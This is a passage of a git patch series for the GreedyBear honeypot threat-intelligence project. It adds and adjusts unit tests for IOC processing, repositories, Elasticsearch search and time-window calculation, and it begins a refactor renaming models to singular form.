+        self.assertEqual(self.mock_ioc_repo.save.call_count, 2)  # Once for create, once at end
+        self.assertTrue(result.scanner)
+        self.assertEqual(len(result.days_seen), 1)
+
+    def test_full_update_flow(self):
+        self.mock_sensor_repo.sensors = set()
+
+        existing = self._create_mock_ioc(
+            attack_count=5,
+            interaction_count=10,
+            related_urls=["http://a.com"],
+            destination_ports=[80],
+            days_seen=[date(2025, 1, 1)],
+            last_seen=datetime(2025, 1, 1, 12, 0, 0),
+        )
+        self.mock_ioc_repo.get_ioc_by_name.return_value = existing
+
+        new = self._create_mock_ioc(
+            attack_count=1,
+            interaction_count=5,
+            related_urls=["http://b.com"],
+            destination_ports=[443],
+            last_seen=datetime(2025, 1, 2, 12, 0, 0),
+        )
+
+        self.mock_ioc_repo.save.return_value = existing
+
+        result = self.processor.add_ioc(new, attack_type=PAYLOAD_REQUEST)
+
+        self.assertEqual(result.attack_count, 6)
+        self.assertEqual(result.interaction_count, 15)
+        self.assertEqual(len(result.related_urls), 2)
+        self.assertEqual(len(result.destination_ports), 2)
+        self.assertEqual(len(result.days_seen), 2)
+        self.assertTrue(result.payload_request)
+
+    @patch("greedybear.cronjobs.extraction.ioc_processor.is_whatsmyip_domain")
+    def test_only_checks_whatsmyip_for_domains(self, mock_whatsmyip):
+        self.mock_sensor_repo.sensors = set()
+        self.mock_ioc_repo.get_ioc_by_name.return_value = None
+        ioc = self._create_mock_ioc(name="1.2.3.4", ioc_type=iocType.IP)
+        self.mock_ioc_repo.save.return_value = ioc
+
+        result = self.processor.add_ioc(ioc, attack_type=SCANNER)
+
+        mock_whatsmyip.assert_not_called()
+        self.assertIsNotNone(result)
+
+
+class TestMergeIocs(ExtractionTestCase):
+    def setUp(self):
+        super().setUp()
+        self.processor = IocProcessor(self.mock_ioc_repo, self.mock_sensor_repo)
+
+    def test_increment_and_add(self):
+        existing = self._create_mock_ioc(
+            attack_count=5,
+            interaction_count=10,
+            login_attempts=5,
+        )
+        new = self._create_mock_ioc(
+            attack_count=1,
+            interaction_count=3,
+            login_attempts=2,
+        )
+
+        result = self.processor._merge_iocs(existing, new)
+
+        self.assertEqual(result.attack_count, 6)
+        self.assertEqual(result.interaction_count, 13)
+        self.assertEqual(result.login_attempts, 7)
+
+    def test_deduplication(self):
+        existing = self._create_mock_ioc(
+            related_urls=["http://a.com", "http://b.com"],
+            destination_ports=[80, 443],
+        )
+        new = self._create_mock_ioc(
+            related_urls=["http://b.com", "http://c.com"],
+            destination_ports=[443, 8080],
+        )
+
+        result = self.processor._merge_iocs(existing, new)
+
+        self.assertEqual(sorted(result.related_urls), ["http://a.com", "http://b.com", "http://c.com"])
+        self.assertEqual(result.destination_ports, [80, 443, 8080])
+
+    def test_updating(self):
+        old_time = datetime(2025, 1, 1, 12, 0, 0)
+        new_time = datetime(2025, 1, 2, 12, 0, 0)
+        existing = self._create_mock_ioc(last_seen=old_time, ip_reputation="old", asn=12)
+        new = self._create_mock_ioc(last_seen=new_time, ip_reputation="new", asn=23)
+
+        result = self.processor._merge_iocs(existing, new)
+
+        self.assertEqual(result.last_seen, new_time)
+        self.assertEqual(result.ip_reputation, "new")
+        self.assertEqual(result.asn, 23)
+
+    def test_handles_empty_urls_and_ports(self):
+        existing = self._create_mock_ioc(related_urls=[], destination_ports=[])
+        new = self._create_mock_ioc(related_urls=[], destination_ports=[])
+
+        result = self.processor._merge_iocs(existing, new)
+
+        self.assertEqual(result.related_urls, [])
+        self.assertEqual(result.destination_ports, [])
+
+
+class TestUpdateDaysSeen(ExtractionTestCase):
+    def setUp(self):
+        super().setUp()
+        self.processor = IocProcessor(self.mock_ioc_repo, self.mock_sensor_repo)
+
+    def test_appends_new_date(self):
+        ioc = self._create_mock_ioc(
+            days_seen=[date(2025, 1, 1)],
+            last_seen=datetime(2025, 1, 2, 12, 0, 0),
+        )
+        ioc.number_of_days_seen = 1
+
+        result = self.processor._update_days_seen(ioc)
+
+        self.assertIn(date(2025, 1, 2), result.days_seen)
+        self.assertEqual(result.number_of_days_seen, 2)
+
+    def test_skips_duplicate_date(self):
+        ioc = self._create_mock_ioc(
+            days_seen=[date(2025, 1, 2)],
+            last_seen=datetime(2025, 1, 2, 15, 0, 0),
+        )
+        ioc.number_of_days_seen = 1
+
+        result = self.processor._update_days_seen(ioc)
+
+        self.assertEqual(len(result.days_seen), 1)
+        self.assertEqual(result.number_of_days_seen, 1)
+
+    def test_handles_empty_days_seen(self):
+        ioc = self._create_mock_ioc(
+            days_seen=[],
+            last_seen=datetime(2025, 1, 1, 12, 0, 0),
+        )
+        ioc.number_of_days_seen = 0
+
+        result = self.processor._update_days_seen(ioc)
+
+        self.assertEqual(len(result.days_seen), 1)
+        self.assertEqual(result.number_of_days_seen, 1)
+        self.assertIn(date(2025, 1, 1), result.days_seen)
+
+    def test_multiple_updates_same_day(self):
+        ioc = self._create_mock_ioc(
+            days_seen=[date(2025, 1, 1)],
+            last_seen=datetime(2025, 1, 1, 12, 0, 0),
+        )
+        ioc.number_of_days_seen = 1
+
+        result = self.processor._update_days_seen(ioc)
+        self.assertEqual(len(result.days_seen), 1)
+
+        result.last_seen = datetime(2025, 1, 1, 18, 0, 0)
+        result = self.processor._update_days_seen(result)
+        self.assertEqual(len(result.days_seen), 1)
+
+    def test_handles_date_boundaries(self):
+        ioc = self._create_mock_ioc(
+            days_seen=[date(2025, 1, 1)],
+            last_seen=datetime(2025, 1, 1, 23, 59, 59),
+        )
+        ioc.number_of_days_seen = 1
+
+        result = self.processor._update_days_seen(ioc)
+        self.assertEqual(len(result.days_seen), 1)
+
+        result.last_seen = datetime(2025, 1, 2, 0, 0, 0)
+        result = self.processor._update_days_seen(result)
+        self.assertEqual(len(result.days_seen), 2)
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
new file mode 100644
index 00000000..d1f10bf0
--- /dev/null
+++ b/tests/test_repositories.py
@@ -0,0 +1,427 @@
+from datetime import datetime
+from unittest.mock import Mock, patch
+
+from greedybear.cronjobs.repositories import CowrieSessionRepository, ElasticRepository, IocRepository, SensorRepository, get_time_window
+from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, Sensors
+
+from . import CustomTestCase
+
+
+class TestIocRepository(CustomTestCase):
+    def setUp(self):
+        self.repo = IocRepository()
+
+    def test_get_ioc_by_name_returns_existing(self):
+        result = self.repo.get_ioc_by_name("140.246.171.141")
+        self.assertIsNotNone(result)
+        self.assertEqual(result.name, "140.246.171.141")
+
+    def test_get_ioc_by_name_returns_none_for_missing(self):
+        result = self.repo.get_ioc_by_name("8.8.8.8")
+        self.assertIsNone(result)
+
+    def test_save_creates_new_ioc(self):
+        ioc = IOC(name="1.2.3.4", type="ip")
+        result = self.repo.save(ioc)
+        self.assertIsNotNone(result.pk)
+        self.assertTrue(IOC.objects.filter(name="1.2.3.4").exists())
+
+    def test_save_updates_existing_ioc(self):
+        ioc = self.repo.get_ioc_by_name("140.246.171.141")
+        original_attack_count = ioc.attack_count
+
+        ioc.attack_count = 10
+        result = self.repo.save(ioc)
+        self.assertEqual(result.attack_count, 10)
+        self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, 10)
+
+        ioc.attack_count = original_attack_count
+        result = self.repo.save(ioc)
+        self.assertEqual(result.attack_count, original_attack_count)
+        self.assertEqual(IOC.objects.get(name="140.246.171.141").attack_count, original_attack_count)
+
+    def test_create_honeypot(self):
+        self.repo.create_honeypot("NewHoneypot")
+        self.assertTrue(GeneralHoneypot.objects.filter(name="NewHoneypot").exists())
+        hp = GeneralHoneypot.objects.get(name="NewHoneypot")
+        self.assertTrue(hp.active)
+
+    def test_get_hp_by_name_returns_existing(self):
+        GeneralHoneypot.objects.create(name="TestPot", active=True)
+        result = self.repo.get_hp_by_name("TestPot")
+        self.assertIsNotNone(result)
+        self.assertEqual(result.name, "TestPot")
+
+    def test_get_hp_by_name_returns_none_for_missing(self):
+        result = self.repo.get_hp_by_name("nonexistent")
+        self.assertIsNone(result)
+
+    def test_is_empty_returns_false_when_has_iocs(self):
+        result = self.repo.is_empty()
+        self.assertFalse(result)
+
+    def test_is_enabled_returns_true_for_cowrie(self):
+        result = self.repo.is_enabled("Cowrie")
+        self.assertTrue(result)
+
+    def test_is_enabled_returns_true_for_log4pot(self):
+        result = self.repo.is_enabled("Log4pot")
+        self.assertTrue(result)
+
+    def test_is_enabled_returns_true_for_active_honeypot(self):
+        result = self.repo.is_enabled("Heralding")
+        self.assertTrue(result)
+
+    def test_is_enabled_returns_false_for_inactive_honeypot(self):
+        result = self.repo.is_enabled("Ddospot")
+        self.assertFalse(result)
+
+    def test_add_honeypot_to_ioc_adds_new_honeypot(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
+        result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
+        self.assertIn(honeypot, result.general_honeypot.all())
+
+    def test_add_honeypot_to_ioc_idempotent(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        honeypot = GeneralHoneypot.objects.create(name="TestPot", active=True)
+        ioc.general_honeypot.add(honeypot)
+        initial_count = ioc.general_honeypot.count()
+        result = self.repo.add_honeypot_to_ioc("TestPot", ioc)
+        self.assertEqual(result.general_honeypot.count(), initial_count)
+        self.assertEqual(ioc.general_honeypot.count(), 1)
+
+    def test_add_honeypot_to_ioc_multiple_honeypots(self):
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        hp1 = GeneralHoneypot.objects.create(name="Pot1", active=True)
+        hp2 = GeneralHoneypot.objects.create(name="Pot2", active=True)
+        self.repo.add_honeypot_to_ioc("Pot1", ioc)
+        self.repo.add_honeypot_to_ioc("Pot2", ioc)
+        self.assertEqual(ioc.general_honeypot.count(), 2)
+        self.assertIn(hp1, ioc.general_honeypot.all())
+        self.assertIn(hp2, ioc.general_honeypot.all())
+
+    def test_existing_honeypots(self):
+        self.assertIn("Cowrie", self.repo._honeypot_cache)
+        self.assertIn("Log4pot", self.repo._honeypot_cache)
+        self.assertIn("Heralding", self.repo._honeypot_cache)
+        self.assertIn("Ciscoasa", self.repo._honeypot_cache)
+        self.assertIn("Ddospot", self.repo._honeypot_cache)
+
+    def test_is_ready_for_extraction_creates_and_enables(self):
+        result = self.repo.is_ready_for_extraction("FooPot")
+        self.assertTrue(result)
+        self.assertTrue(GeneralHoneypot.objects.filter(name="FooPot").exists())
+
+
+class TestSensorRepository(CustomTestCase):
+    def setUp(self):
+        self.repo = SensorRepository()
+
+    def test_sensors_property_returns_cached_sensors(self):
+        self.repo.add_sensor("192.168.1.1")
+        self.repo.add_sensor("192.168.1.2")
+        result = self.repo.sensors
+        self.assertEqual(len(result), 2)
+        self.assertIn("192.168.1.1", result)
+        self.assertIn("192.168.1.2", result)
+
+    def test_add_sensor_creates_new_sensor(self):
+        result = self.repo.add_sensor("192.168.1.3")
+        self.assertTrue(result)
+        self.assertTrue(Sensors.objects.filter(address="192.168.1.3").exists())
+        self.assertIn("192.168.1.3", self.repo.cache)
+
+    def test_add_sensor_returns_false_for_existing_sensor(self):
+        self.repo.add_sensor("192.168.1.1")
+        result = self.repo.add_sensor("192.168.1.1")
+        self.assertFalse(result)
+        self.assertEqual(Sensors.objects.filter(address="192.168.1.1").count(), 1)
+
+    def test_add_sensor_rejects_non_ip(self):
+        result = self.repo.add_sensor("not-an-ip")
+        self.assertFalse(result)
+        self.assertFalse(Sensors.objects.filter(address="not-an-ip").exists())
+
+    def test_add_sensor_rejects_domain(self):
+        result = self.repo.add_sensor("example.com")
+        self.assertFalse(result)
+        self.assertFalse(Sensors.objects.filter(address="example.com").exists())
+
+    def test_cache_populated_on_init(self):
+        Sensors.objects.create(address="192.168.1.1")
+        Sensors.objects.create(address="192.168.1.2")
+        repo = SensorRepository()
+        self.assertEqual(len(repo.cache), 2)
+        self.assertIn("192.168.1.1", repo.cache)
+        self.assertIn("192.168.1.2", repo.cache)
+
+    def test_add_sensor_updates_cache(self):
+        initial_cache_size = len(self.repo.cache)
+        self.repo.add_sensor("192.168.1.1")
+        self.assertEqual(len(self.repo.cache), initial_cache_size + 1)
+
+    def test_add_sensor_accepts_valid_ipv4(self):
+        test_ips = ["1.2.3.4", "192.168.1.1", "10.0.0.1", "8.8.8.8"]
+        for ip in test_ips:
+            result = self.repo.add_sensor(ip)
+            self.assertTrue(result)
+
+
+class TestCowrieSessionRepository(CustomTestCase):
+    def setUp(self):
+        self.repo = CowrieSessionRepository()
+
+    def test_get_or_create_session_creates_new(self):
+        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        result = self.repo.get_or_create_session(session_id="123456", source=source_ioc)
+        self.assertIsNotNone(result)
+        self.assertEqual(result.session_id, int("123456", 16))
+        self.assertEqual(result.source, source_ioc)
+
+    def test_get_or_create_session_returns_existing(self):
+        existing_session_id = "ffffffffffff"
+        source = self.cowrie_session.source
+        result = self.repo.get_or_create_session(existing_session_id, source=source)
+        self.assertEqual(result.pk, int(existing_session_id, 16))
+        self.assertTrue(result.login_attempt)
+
+    def test_get_or_create_raises_on_invalid_session_id(self):
+        session_id = "gggggggggggg"
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+        with self.assertRaises(ValueError):
+            self.repo.get_or_create_session(session_id, source=source)
+
+    def test_save_session_persists_to_database(self):
+        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        session = CowrieSession(session_id=12345, source=source_ioc)
+        result = self.repo.save_session(session)
+        self.assertIsNotNone(result.pk)
+        self.assertTrue(CowrieSession.objects.filter(session_id=12345).exists())
+
+    def test_save_session_updates_existing(self):
+        existing_session_id = "ffffffffffff"
+        source = self.cowrie_session.source
+        session = self.repo.get_or_create_session(existing_session_id, source=source)
+
+        original_interaction_count = session.interaction_count
+        session.interaction_count = 10
+        result = self.repo.save_session(session)
+        self.assertEqual(result.interaction_count, 10)
+        self.assertEqual(CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count, 10)
+
+        session.interaction_count = original_interaction_count
+        result = self.repo.save_session(session)
+        self.assertEqual(result.interaction_count, original_interaction_count)
+        self.assertEqual(CowrieSession.objects.get(session_id=int(existing_session_id, 16)).interaction_count, original_interaction_count)
+
+    def test_get_command_sequence_by_hash_returns_existing(self):
+        existing = self.command_sequence
+        result = self.repo.get_command_sequence_by_hash(existing.commands_hash)
+        self.assertIsNotNone(result)
+        self.assertEqual(result.pk, existing.pk)
+        self.assertEqual(result.commands_hash, existing.commands_hash)
+
+    def test_get_command_sequence_by_hash_returns_none_for_missing(self):
+        result = self.repo.get_command_sequence_by_hash("nonexistent")
+        self.assertIsNone(result)
+
+    def test_save_command_sequence_persists_to_database(self):
+        cmd_seq = CommandSequence(
+            commands=["ls", "pwd", "whoami"],
+            commands_hash="def456",
+        )
+        result = self.repo.save_command_sequence(cmd_seq)
+        self.assertIsNotNone(result.pk)
+        self.assertTrue(CommandSequence.objects.filter(commands_hash="def456").exists())
+
+    def test_save_command_sequence_updates_existing(self):
+        existing = self.command_sequence
+        existing.last_seen = datetime(2025, 1, 2)
+        self.repo.save_command_sequence(existing)
+        updated = CommandSequence.objects.get(commands_hash=existing.commands_hash)
+        self.assertEqual(updated.last_seen.date(), datetime(2025, 1, 2).date())
+
+    def test_get_or_create_session_with_hex_session_id(self):
+        session_id = "abc123"
+        source_ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+        result = self.repo.get_or_create_session(session_id=session_id, source=source_ioc)
+        self.assertEqual(result.session_id, int(session_id, 16))
+
+    def test_command_sequence_unique_hash_constraint(self):
+        existing = self.command_sequence
+        with self.assertRaises(Exception):
+            CommandSequence.objects.create(
+                commands=["different", "commands"],
+                commands_hash=existing.commands_hash,
+            )
+
+
+class TestElasticRepository(CustomTestCase):
+    def setUp(self):
+        self.mock_client = Mock()
+        self.mock_client.ping.return_value = True
+
+        patcher = patch("greedybear.cronjobs.repositories.elastic.settings")
+        self.mock_settings = patcher.start()
+        self.mock_settings.ELASTIC_CLIENT = self.mock_client
+        self.addCleanup(patcher.stop)
+
+        self.repo = ElasticRepository()
+
+    def test_healthcheck_passes_when_ping_succeeds(self):
+        self.mock_client.ping.return_value = True
+        self.repo._healthcheck()
+        self.mock_client.ping.assert_called_once()
+
+    def test_healthcheck_raises_when_ping_fails(self):
+        self.mock_client.ping.return_value = False
+        with self.assertRaises(ElasticRepository.ElasticServerDownException) as ctx:
+            self.repo._healthcheck()
+        self.assertIn("not reachable", str(ctx.exception))
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    def test_search_returns_cached_list_not_generator(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+
+        mock_hits = [{"name": f"hit{i}", "@timestamp": i} for i in range(20_000)]
+        mock_search.scan.return_value = iter(mock_hits)
+
+        first_iteration = list(self.repo.search(minutes_back_to_lookup=10))
+        second_iteration = list(self.repo.search(minutes_back_to_lookup=10))
+        self.assertEqual(len(first_iteration), 20_000)
+        self.assertEqual(len(second_iteration), 20_000)
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    def test_search_returns_ordered_list(self, mock_search_class):
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+
+        mock_hits = [{"name": f"hit{i}", "@timestamp": i % 7} for i in range(20_000)]
+        mock_search.scan.return_value = iter(mock_hits)
+
+        result = list(self.repo.search(minutes_back_to_lookup=10))
+        is_ordered = all(a["@timestamp"] <= b["@timestamp"] for a, b in zip(result, result[1:]))
+        self.assertTrue(is_ordered)
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", True)
+    def test_search_legacy_mode_uses_relative_time(self, mock_search_class):
+        """Test legacy extraction uses relative time queries"""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        # Verify query was called (legacy mode uses different query structure)
+        self.repo.search(minutes_back_to_lookup=11)
+        mock_search.query.assert_called_once()
+
+    @patch("greedybear.cronjobs.repositories.elastic.Search")
+    @patch("greedybear.cronjobs.repositories.elastic.LEGACY_EXTRACTION", False)
+    @patch("greedybear.cronjobs.repositories.elastic.get_time_window")
+    def test_search_non_legacy_uses_time_window(self, mock_get_time_window, mock_search_class):
+        """Test non-legacy extraction uses get_time_window"""
+        mock_search = Mock()
+        mock_search_class.return_value = mock_search
+        mock_search.query.return_value = mock_search
+        mock_search.source.return_value = mock_search
+        mock_search.scan.return_value = iter([])
+
+        window_start = datetime(2025, 1, 1, 12, 0, 0)
+        window_end = datetime(2025, 1, 1, 12, 10, 0)
+        mock_get_time_window.return_value = (window_start, window_end)
+
+        self.repo.search(minutes_back_to_lookup=10)
+
+        mock_get_time_window.assert_called_once()
+
+
+class TestTimeWindowCalculation(CustomTestCase):
+    def test_basic_10min_window(self):
+        """Test a basic window without custom lookback"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_with_custom_lookback(self):
+        """Test window with custom lookback time"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 10, 14, 5)  # 14:05
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_with_custom_extraction_interval(self):
+        """Test window with custom extraction interval time"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=15, extraction_interval=15)
+
+        expected_end = datetime(2024, 1, 10, 14, 15)  # 14:15
+        expected_start = datetime(2024, 1, 10, 14, 00)  # 14:00
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_exact_boundary(self):
+        """Test behavior when reference time is exactly on a window boundary"""
+        reference = datetime(2024, 1, 10, 14, 20)  # 14:20 exactly
+        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 10, 14, 10)  # 14:10
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_invalid_lookback(self):
+        """Test that function raises ValueError for invalid lookback"""
+        reference = datetime(2024, 1, 10, 14, 23)
+
+        with self.assertRaises(ValueError):
+            get_time_window(reference, lookback_minutes=5, extraction_interval=10)
+
+    def test_invalid_extraction_interval(self):
+        """Test that function raises ValueError for invalid extraction interval"""
+        reference = datetime(2024, 1, 10, 14, 23)
+
+        with self.assertRaises(ValueError):
+            get_time_window(reference, lookback_minutes=10, extraction_interval=9)
+
+    def test_day_boundary_crossing(self):
+        """Test behavior when window crosses a day boundary"""
+        reference = datetime(2024, 1, 11, 0, 5)  # 00:00
+        start, end = get_time_window(reference, lookback_minutes=10, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 11, 0, 0)  # 00:00
+        expected_start = datetime(2024, 1, 10, 23, 50)  # 23:50 on previous day
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
+
+    def test_large_lookback(self):
+        """Test with a large lookback that crosses multiple days"""
+        reference = datetime(2024, 1, 10, 14, 23)  # 14:23
+        start, end = get_time_window(reference, lookback_minutes=60 * 24 * 3, extraction_interval=10)
+
+        expected_end = datetime(2024, 1, 10, 14, 20)  # 14:20
+        expected_start = datetime(2024, 1, 7, 14, 20)  # 14:20, 3 days earlier
+
+        self.assertEqual(start, expected_start)
+        self.assertEqual(end, expected_end)
diff --git a/tests/test_scoring_utils.py b/tests/test_scoring_utils.py
index 0febc5c6..7e11a531 100644
--- a/tests/test_scoring_utils.py
+++ b/tests/test_scoring_utils.py
@@ -116,8 +116,9 @@ def test_multi_label_encode_ioc(self):
         data = get_current_data()
         features = get_features(data, today)
         features = multi_label_encode(features, "honeypots").to_dict("records")
+        features.sort(key=lambda d: d["value"], reverse=True)
         for h in ["heralding", "ciscoasa", "log4j", "cowrie"]:
-            self.assertEqual(features[0][f"has_{h}"], 1)
+            self.assertEqual(features[1][f"has_{h}"], 1)
 
     def test_multi_label_encode_sample(self):
         """Test with sample data"""
diff --git a/tests/test_views.py b/tests/test_views.py
index 716abb5c..a265b3af 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -292,10 +292,10 @@ def test_200_enrichment_requests(self):
         self.assertEqual(response.json()[0]["Requests"], 1)
 
     def test_200_feed_types(self):
-        self.assertEqual(GeneralHoneypot.objects.count(), 2)
+        self.assertEqual(GeneralHoneypot.objects.count(), 3)
         # add a general honeypot without associated ioc
         GeneralHoneypot(name="Tanner", active=True).save()
-        self.assertEqual(GeneralHoneypot.objects.count(), 3)
+        self.assertEqual(GeneralHoneypot.objects.count(), 4)
 
         response = self.client.get("/api/statistics/feeds_types")
         self.assertEqual(response.status_code, 200)
@@ -309,17 +309,17 @@ def test_200_feed_types(self):
 
 class GeneralHoneypotViewTestCase(CustomTestCase):
     def test_200_all_general_honeypots(self):
-        self.assertEqual(GeneralHoneypot.objects.count(), 2)
+        self.assertEqual(GeneralHoneypot.objects.count(), 3)
         # add a general honeypot not active
         GeneralHoneypot(name="Adbhoney", active=False).save()
-        self.assertEqual(GeneralHoneypot.objects.count(), 3)
+        self.assertEqual(GeneralHoneypot.objects.count(), 4)
 
         response = self.client.get("/api/general_honeypot")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json(), ["Heralding", "Ciscoasa", "Adbhoney"])
+        self.assertEqual(response.json(), ["Heralding", "Ciscoasa", "Ddospot", "Adbhoney"])
 
     def test_200_active_general_honeypots(self):
-        self.assertEqual(GeneralHoneypot.objects.count(), 2)
+        self.assertEqual(GeneralHoneypot.objects.count(), 3)
         response = self.client.get("/api/general_honeypot?onlyActive=true")
         self.assertEqual(response.status_code, 200)
         self.assertEqual(response.json(), ["Heralding", "Ciscoasa"])

From bc66e455485ba2cfe6d645c7cdc109454df15bee Mon Sep 17 00:00:00 2001
From: srijan <141031709+srijan2607@users.noreply.github.com>
Date: Tue, 23 Dec 2025 16:15:47 +0530
Subject: [PATCH 06/75] Refactor: Rename models to singular form and fix admin
 registration (#643)

* Refactor: Rename models to singular form and fix admin registration

* Fix: Remove trailing whitespace in sensor.py

* Revert: Remove configurable log directory setting
---
 greedybear/admin.py                           | 10 ++--
 greedybear/cronjobs/extraction/utils.py       | 10 ++--
 greedybear/cronjobs/mass_scanners.py          |  8 ++--
 greedybear/cronjobs/repositories/sensor.py    |  6 +--
 greedybear/cronjobs/whatsmyip.py              |  8 ++--
 ...ename_massscanners_massscanner_and_more.py | 48 +++++++++++++++++++
 greedybear/models.py                          |  6 +--
 tests/test_extraction_utils.py                | 12 ++---
 tests/test_repositories.py                    | 14 +++---
 9 files changed, 85 insertions(+), 37 deletions(-)
 create mode 100644 greedybear/migrations/0023_rename_massscanners_massscanner_and_more.py

diff --git a/greedybear/admin.py b/greedybear/admin.py
index 33479bbd..5b04fab8 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -5,14 +5,14 @@
 from django.contrib import admin, messages
 from django.db.models import Q
 from django.utils.translation import ngettext
-from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, MassScanners, Sensors, Statistics, WhatsMyIP
+from greedybear.models import IOC, CommandSequence, CowrieSession, GeneralHoneypot, MassScanner, Sensor, Statistics, WhatsMyIPDomain
 
 logger = logging.getLogger(__name__)
 
 
-@admin.register(Sensors)
+@admin.register(Sensor)
 class SensorsModelAdmin(admin.ModelAdmin):
-    list_display = [field.name for field in Sensors._meta.get_fields()]
+    list_display = [field.name for field in Sensor._meta.get_fields()]
 
 
 @admin.register(Statistics)
@@ -23,14 +23,14 @@ class StatisticsModelAdmin(admin.ModelAdmin):
     search_help_text = ["search for the IP address source"]
 
 
-@admin.register(WhatsMyIP)
+@admin.register(WhatsMyIPDomain)
 class WhatsMyIPModelAdmin(admin.ModelAdmin):
     list_display = ["domain", "added"]
     search_fields = ["domain"]
     search_help_text = ["search for the domain"]
 
 
-@admin.register(MassScanners)
+@admin.register(MassScanner)
 class MassScannersModelAdmin(admin.ModelAdmin):
     list_display = ["ip_address", "added", "reason"]
     list_filter = ["reason"]
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 9784ecbf..118468b5 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -7,7 +7,7 @@
 import requests
 from django.conf import settings
 from greedybear.consts import DOMAIN, IP
-from greedybear.models import IOC, MassScanners, WhatsMyIP
+from greedybear.models import IOC, MassScanner, WhatsMyIPDomain
 
 
 def is_whatsmyip_domain(domain: str) -> bool:
@@ -21,8 +21,8 @@ def is_whatsmyip_domain(domain: str) -> bool:
         True if the domain is in the WhatsMyIP list, False otherwise.
     """
     try:
-        WhatsMyIP.objects.get(domain=domain)
-    except WhatsMyIP.DoesNotExist:
+        WhatsMyIPDomain.objects.get(domain=domain)
+    except WhatsMyIPDomain.DoesNotExist:
         return False
     return True
 
@@ -42,8 +42,8 @@ def correct_ip_reputation(ip: str, ip_reputation: str) -> str:
     """
     if not ip_reputation or ip_reputation == "known attacker":
         try:
-            MassScanners.objects.get(ip_address=ip)
-        except MassScanners.DoesNotExist:
+            MassScanner.objects.get(ip_address=ip)
+        except MassScanner.DoesNotExist:
             pass
         else:
             ip_reputation = "mass scanner"
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index 249ec54c..81a41279 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -2,7 +2,7 @@
 
 import requests
 from greedybear.cronjobs.base import Cronjob
-from greedybear.models import IOC, MassScanners
+from greedybear.models import IOC, MassScanner
 
 
 class MassScannersCron(Cronjob):
@@ -18,10 +18,10 @@ def run(self) -> None:
                     ip_address = match.group(1)
                     reason = match.group(2)
                     try:
-                        MassScanners.objects.get(ip_address=ip_address)
-                    except MassScanners.DoesNotExist:
+                        MassScanner.objects.get(ip_address=ip_address)
+                    except MassScanner.DoesNotExist:
                         self.log.info(f"added new mass scanner {ip_address}")
-                        MassScanners(ip_address=ip_address, reason=reason).save()
+                        MassScanner(ip_address=ip_address, reason=reason).save()
                         self._update_old_ioc(ip_address)
                 else:
                     self.log.warning(f"unexpected line: {line}")
diff --git a/greedybear/cronjobs/repositories/sensor.py b/greedybear/cronjobs/repositories/sensor.py
index 4f722daf..0e111789 100644
--- a/greedybear/cronjobs/repositories/sensor.py
+++ b/greedybear/cronjobs/repositories/sensor.py
@@ -2,7 +2,7 @@
 
 from greedybear.consts import IP
 from greedybear.cronjobs.extraction.utils import get_ioc_type
-from greedybear.models import Sensors
+from greedybear.models import Sensor
 
 
 class SensorRepository:
@@ -46,7 +46,7 @@ def add_sensor(self, ip: str) -> bool:
         if get_ioc_type(ip) != IP:
             self.log.debug(f"{ip} is not an IP address - won't add as a sensor")
             return False
-        sensor = Sensors(address=ip)
